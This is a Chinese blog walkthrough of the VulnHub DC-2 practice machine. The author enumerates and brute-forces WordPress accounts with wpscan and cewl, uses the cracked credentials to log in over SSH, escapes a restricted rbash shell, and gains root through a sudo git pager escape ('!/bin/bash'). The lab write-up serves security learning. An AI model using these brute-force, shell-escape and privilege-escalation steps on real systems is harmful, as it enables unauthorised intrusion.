惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Martin Fowler
Martin Fowler
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
T
Troy Hunt's Blog
Latest news
Latest news
Vercel News
Vercel News
S
SegmentFault 最新的问题
V
Vulnerabilities – Threatpost
博客园 - Franky
P
Privacy International News Feed
A
Arctic Wolf
T
The Blog of Author Tim Ferriss
S
Schneier on Security
T
The Exploit Database - CXSecurity.com
P
Palo Alto Networks Blog
T
Tor Project blog
Jina AI
Jina AI
GbyAI
GbyAI
The Hacker News
The Hacker News
博客园 - 叶小钗
Google DeepMind News
Google DeepMind News
T
Threatpost
C
CERT Recently Published Vulnerability Notes
P
Proofpoint News Feed
Scott Helme
Scott Helme
WordPress大学
WordPress大学
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Microsoft Azure Blog
Microsoft Azure Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
博客园 - 司徒正美
A
About on SuperTechFans
Recorded Future
Recorded Future
爱范儿
爱范儿
L
LangChain Blog
V
V2EX
C
Cybersecurity and Infrastructure Security Agency CISA
The Cloudflare Blog
阮一峰的网络日志
阮一峰的网络日志
K
Kaspersky official blog
Webroot Blog
Webroot Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
D
DataBreaches.Net
宝玉的分享
宝玉的分享
Google Online Security Blog
Google Online Security Blog
C
Cisco Blogs
L
Lohrmann on Cybersecurity
Help Net Security
Help Net Security
AWS News Blog
AWS News Blog
M
MIT News - Artificial intelligence
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
G
GRAHAM CLULEY

猫涅的秘密结社

hackthissite-org 数据库原理相关 关于在与我互动前你可能需要了解的事 信安roadmap 个人主页开发汇报 六级生词速记本——附考后感想 数据结构C++自学相关 NewStarCTF-2025 三款steam付费番茄钟软件测评 夏令营-ai hello-world qt环境下的c++程序编写 新新的年 qq机器人配置二三事 搞点java 读书笔记-当下的力量 网页小修时间 glibc更新记录 Vulhub在线靶场记录 Vulhub记录(旧的) 神奇脚本在哪里-CTF之Pwn BaseCTF高校联合新生赛2024 逆逆逆逆逆向-CTF之reverse 求解 夺旗时间 学学学 渗透测试相关 协议/漏洞/网络 最新的知识点 数据分析相关 zico2解析 OverTheWire-bandit解析 CTF实战相关2 靶机解析-gigachad ctf实战相关1 复习time 开学季 维修时间 小小修整 学校实训-笔记 每周靶机之Beelzebub 读书笔记-如何阅读一本书 DC-4解析 每周靶机之ted 靶机-DC-1 每周靶机之bob potato解析 xss跨站点脚本攻击 每周靶机之Tommyboy1dot0 owasp命令执行漏洞 owasp文件包含漏洞 每周靶机之WALLABY'S-NIGHTMARE owasp上传漏洞 Hackademic.RTB1 owasp与sql注入与sqlmap liunx中sudo服务相关知识 liunx中ssh服务相关知识 moneybox解析 C语言相关1 关于加入aplayer的方式 再来一次 关于在next7.8.0中建设评论功能这件事 目前的进展 编辑小提示
DC-2解析
nirvana_felis · 2023-12-22 · via 猫涅的秘密结社

这个是学校作业
下载地址:https://www.vulnhub.com/entry/dc-2,311/

环境设置

攻击机:kali
靶机:DC-2
网络链接均为Nat模式

相关知识与工具

wpscan (WordPress爆破用)
MSF console (漏洞检索&调用)
dirb (目录扫描)
cewl (给url生成密码目录)
绕过bash限制
git 提权

具体过程

国际惯例 arp-scan -l发现同网段设备 使用nmap扫描ip开放的端口
1
我们访问网站 发现无法访问
这里需要修改hosts文件

1
vim /etc/hosts //编辑 随后另起一行 输入[靶机的ip地址] [dc-2]

这么一改 这个ip就和dc-2绑定了 重定向也不会出错
进入网站 发现网站是wordpress框架
里面翻了一遍 没啥隐藏的玩意 只有一个flag
15
[大意:通常的密码表爆破估计不会有用 你估计得要变得cewl(特指工具名) 登录网站来获取下个flag 如果没有 就换个账号]
那我们现在的目标转向wordpress的账号密码获取与登录页面的寻找(毕竟有账号密码没得登录怎么办呢)
我们先利用msfconsole中的目录扫描工具(关键词dir_scan)

1
2
3
4
5
6
msfconsole //启用msfconsole
search [关键字] //以关键字为目标查找漏洞 (tips:Name中/webapp对应web漏洞 /http对应与http协议有关漏洞)
配合前者- use/info+[上一次搜索结果中漏洞对应的序号] //使用/查看对应漏洞
也可以直接use/info+[漏洞Name]
set RHOSTS [需要爆破的ip] //指定目标
run //执行

3
找到了 wp-includes 但里面的文件实在太多 使用dirb再次扫描 缩小范围吧
4

[-X 限制文件后缀]
发现了登陆页面(wp-login.php)

账号方面使用wpscan获取

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能.

1
2
3
4
5
6
7
8
>--update 更新到最新版本
>--url | -u <target url> 要扫描的`WordPress`站点.
>--force | -f 不检查网站运行的是不是`WordPress`
>--enumerate | -e [option(s)] 枚举
>u 枚举用户名,默认从1-10
>u[10-20] 枚举用户名,配置从10-20
>--username | -U <username指定爆破的用户名
>--wordlist | -w <wordlist指定密码字典

这里用到枚举功能 发现有3个用户名 分别是admin jerry tom

5

我们生成一个用户名表 把这仨放进去 方便后面爆破
6
密码方面遵从flag的提示 使用cwel工具
cwel [网址] -w [生成文件名]
7
随后用户名表有了 密码表也有了 我们用wpscan来爆破一下
wpscan --url [网址] -U [用户名表] -P [密码表]
8

找出了tom与jerry的密码
我们进入登陆页面 发现jerry账号处有flag
9
[大意:换个捷径 也就是另一个入口试试看吧]
那么我们就能想到刚刚开放的7744端口对应了ssh服务 尝试登陆
发现用刚才爆破出的tom账号密码可以登陆
10
登陆后发现tom用户无法执行系统指令 用户默认shell为rbash

1
2
3
4
5
绕过bash限制(这里基本看不懂就把原教程贴上来吧嘻嘻)
BASH\_CMDS[a]=/bin/sh
a/bin/bashexport
PATH=$PATH:/binexport
PATH=$PAH:/usr/bin

在执行了绕过后 通过查看文件发现flag3
11
[大意:可怜的老tom老追着jerry跑 也许需要su一下?]
我们su jerry来切换用户
12
切换之后就找到了flag4
13
[大意:最后一个flag才算数哦 用git逃出这里吧]
jerry的权限不足以访问/root 看来是需要git 提权了

参考:csdn-2022-渗透测试-git提权(Linux)

1
2
sudo git help config
!/bin/bash或者!'sh'完成提权

这样操作完之后就能访问root了
14
完事!

总结

dc这个系列的靶机好像就是每期针对一个不同类型的博客框架进行拆解啊
wordpress之前接触过所以还算好说
那我们下次见吧